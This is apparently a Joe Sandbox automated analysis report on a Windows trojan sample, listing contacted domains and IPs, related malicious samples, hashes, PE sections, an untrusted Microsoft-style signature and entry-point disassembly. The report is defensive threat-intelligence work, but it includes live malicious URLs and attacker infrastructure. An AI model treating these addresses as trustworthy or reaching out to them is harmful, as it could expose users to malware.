                                                                                                                                                    http://www.barnesassetrecovery.store/md02/www.upcyclecharms.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.teplo-invest.com/md02/www.zbbnp.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.teplo-invest.com/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.partymaxclubmen36.clickReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.rakring.com/md02/explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.zbbnp.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.teplo-invest.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.zbbnp.xyz/md02/www.33mgbet.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://api.msn.com/explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      103.235.47.188
                                                                                                                                                                      www.wshifen.comHong Kong
                                                                                                                                                                      55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdtrue
                                                                                                                                                                      104.18.14.105
                                                                                                                                                                      cbmsource-web-5091.rejcdn.comUnited States
                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                      Analysis ID:1529801
                                                                                                                                                                      Start date and time:2024-10-09 12:32:08 +02:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 10m 36s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Sample name:Iifpj4i2kC.exe
                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                      Original Sample Name:fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0.exe
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@13/0@13/2
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 72%
                                                                                                                                                                      • Number of executed functions: 64
                                                                                                                                                                      • Number of non-executed functions: 246
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      06:33:21API Interceptor8433292x Sleep call for process: explorer.exe modified
                                                                                                                                                                      06:33:45API Interceptor7591716x Sleep call for process: wlanext.exe modified
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      103.235.47.1883.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      CZyOWoN2hiszA6d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
                                                                                                                                                                      f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      LisectAVT_2403002A_489.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      7Y18r(100).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      7Y18r(100).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.baidu.com/
                                                                                                                                                                      104.18.14.105pLGt7Q7FHj.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • qhutv.com/v2/E452684F-C138-4390-BFC8-A9E48B2F1649?v=newcounterado1
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      www.wshifen.comhttps://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      kHslwiV2w6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 103.235.47.188
                                                                                                                                                                      http://wap.smarthomehungary.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://www.allencai.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      LuJJk0US5g.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      https://ebaite.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://wap.theblmediagroup.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.47.188
                                                                                                                                                                      http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.47.188
                                                                                                                                                                      http://www.tpckn.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://dl.im-dl.shop/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      cbmsource-web-5091.rejcdn.comNarud#U017ebenica 08BIH2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 104.18.43.29
                                                                                                                                                                      pixie.porkbun.comSecuriteInfo.com.Exploit.CVE-2017-11882.123.7774.12516.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      PR_Form_20240809_145815.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      doc78891&7388972367.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      r777528623004-FedEx-Shipping-Label.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      TKmXl4wRgh7Wbvr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      NUEVO ORDEN_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      AB2hQJZ77ipdWem.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • 44.227.65.245
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      CLOUDFLARENETUS4XQ5CxjWnW.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      mkN4VLmTt4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      rRdJ0JnTcM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      ixgyfGK4yl.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      HWAf2RPKH6.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      1tCwYQCFhP.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      dOUqnFQ67h.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      rrpC2ZDgUd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                      kG713MWffq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      rRdJ0JnTcM.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdhttp://guantongfan.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 182.61.201.93
                                                                                                                                                                      https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://wap.smarthomehungary.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 182.61.244.229
                                                                                                                                                                      http://www.allencai.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 182.61.244.229
                                                                                                                                                                      LuJJk0US5g.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      https://okfun188.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.10.104.119
                                                                                                                                                                      https://ebaite.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://wap.theblmediagroup.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      http://www.tpckn.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 103.235.46.96
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No created / dropped files found
                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Entropy (8bit):7.067666110947127
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                      • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                      File name:Iifpj4i2kC.exe
                                                                                                                                                                      File size:1'627'744 bytes
                                                                                                                                                                      MD5:f6e047942236cefdcd6559bca66a7b3e
                                                                                                                                                                      SHA1:28aac545fcd0c9b11d2546110966b812d1c6d920
                                                                                                                                                                      SHA256:fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0
                                                                                                                                                                      SHA512:5cb5d39d739e1698772e59b3f50da44cb7279a3f7df1ac5319dedc823f62ecf14f5b0ff68c4e67fe8e1595235242f83d17c86b50e82c16b8c8e6cc40d7525eeb
                                                                                                                                                                      SSDEEP:49152:WAodtaG9kS2U84B+FLan9k5TRM9zlCVjkvr:K/B1Jz
                                                                                                                                                                      TLSH:D375BF19E3A811FCD52BC634CA55A233E6B174560B21A4CF1B99C7452FB3EE26B7B301
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............
                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                      Entrypoint:0x14006ac2c
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:22a65106d3d84ea74d966fa0424a5a0c
                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                      Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                      Error Number:-2146762487
                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                      • 24/09/2024 08:07:22 24/09/2025 08:07:22
                                                                                                                                                                      Subject Chain
                                                                                                                                                                      • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                      Version:3
                                                                                                                                                                      Thumbprint MD5:8826EDA56AE918ACA0EB62B575B57F1B
                                                                                                                                                                      Thumbprint SHA-1:053CD73422AF02946A364378AE001C1964B05CAB
                                                                                                                                                                      Thumbprint SHA-256:600744D0FF24705E75C13BB64D916B2A929E430747C684D8854AD8E6CCDA519B
                                                                                                                                                                      Serial:7E3F87EB2FC12CDCDDCCE4A1AE9D2DCA
                                                                                                                                                                      Instruction
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                      call 00007F9350E0456Ch
                                                                                                                                                                      dec eax
                                                                                                                                                                      add esp, 28h
                                                                                                                                                                      jmp 00007F9350E03D97h
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      jmp 00007F9350E048E8h
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                      call 00007F9350E048E4h
                                                                                                                                                                      jmp 00007F9350E03F24h
                                                                                                                                                                      xor eax, eax
                                                                                                                                                                      dec eax
                                                                                                                                                                      add esp, 28h
                                                                                                                                                                      ret
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      jmp 00007F9350E03F0Ch
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                      dec ebp
                                                                                                                                                                      mov eax, dword ptr [ecx+38h]
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov ecx, edx
                                                                                                                                                                      dec ecx
                                                                                                                                                                      mov edx, ecx
                                                                                                                                                                      call 00007F9350E03F32h
                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                      dec eax
                                                                                                                                                                      add esp, 28h
                                                                                                                                                                      ret
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      inc eax
                                                                                                                                                                      push ebx
                                                                                                                                                                      inc ebp
                                                                                                                                                                      mov ebx, dword ptr [eax]
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov ebx, edx
                                                                                                                                                                      inc ecx
                                                                                                                                                                      and ebx, FFFFFFF8h
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov ecx, ecx
                                                                                                                                                                      inc ecx
                                                                                                                                                                      test byte ptr [eax], 00000004h
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov edx, ecx
                                                                                                                                                                      je 00007F9350E03F35h
                                                                                                                                                                      inc ecx
                                                                                                                                                                      mov eax, dword ptr [eax+08h]
                                                                                                                                                                      dec ebp
                                                                                                                                                                      arpl word ptr [eax+04h], dx
                                                                                                                                                                      neg eax
                                                                                                                                                                      dec esp
                                                                                                                                                                      add edx, ecx
                                                                                                                                                                      dec eax
                                                                                                                                                                      arpl ax, cx
                                                                                                                                                                      dec esp
                                                                                                                                                                      and edx, ecx
                                                                                                                                                                      dec ecx
                                                                                                                                                                      arpl bx, ax
                                                                                                                                                                      dec edx
                                                                                                                                                                      mov edx, dword ptr [eax+edx]
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov eax, dword ptr [ebx+10h]
                                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov eax, dword ptr [ebx+08h]
                                                                                                                                                                      test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                      je 00007F9350E03F2Dh
                                                                                                                                                                      movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                      and eax, FFFFFFF0h
                                                                                                                                                                      dec esp
                                                                                                                                                                      add ecx, eax
                                                                                                                                                                      dec esp
                                                                                                                                                                      xor ecx, edx
                                                                                                                                                                      dec ecx
                                                                                                                                                                      mov ecx, ecx
                                                                                                                                                                      pop ebx
                                                                                                                                                                      jmp 00007F9350E03F36h
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      nop word ptr [eax+eax+00000000h]
                                                                                                                                                                      dec eax
                                                                                                                                                                      cmp ecx, dword ptr [00000049h]
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x17f3c00x5c.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x17f41c0xf0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x19c0000x2eb54.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x18f0000xcdec.pdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x18b8000x1e60.data
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cb0000x5b8.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x165ae00x54.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x165d000x28.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1659a00x140.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x11a0000x6a0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x6f1880x6f20016824105689e93571b28f6d652acf3f1False0.45466728768278963data6.6338226603175485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .managed0x710000x77a280x77c00459fe8e4d0429964edfb07e39e66b232False0.46850331093423797data6.473781869755907IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      hydrated0xe90000x304980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rdata0x11a0000x66c6a0x66e007df08d7d95f6107c50c873cb3368ef26False0.48810088851761846data6.702736272283783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x1810000xd5a80x18009d5075bd44b367f703d8e922b003398aFalse0.2294921875data3.190641782829915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .pdata0x18f0000xcdec0xce00638451eb673a6cdf25f666b19f1b8bb4False0.49419751213592233data6.064103613023274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0x19c0000x2eb540x2ec00a9622bdd9363b21229c0fc67521649a0False0.9952111881684492data7.996796800307504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x1cb0000x5b80x600adcf9b9e4d3994d1018ad464f4f1db74False0.5826822916666666data5.215191968056739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      BINARY0x19c1300x2e484data1.0003481526807756
                                                                                                                                                                      RT_VERSION0x1ca5b40x3b4data0.3438818565400844
                                                                                                                                                                      RT_MANIFEST0x1ca9680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                      DLLImport
                                                                                                                                                                      ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
                                                                                                                                                                      bcrypt.dllBCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
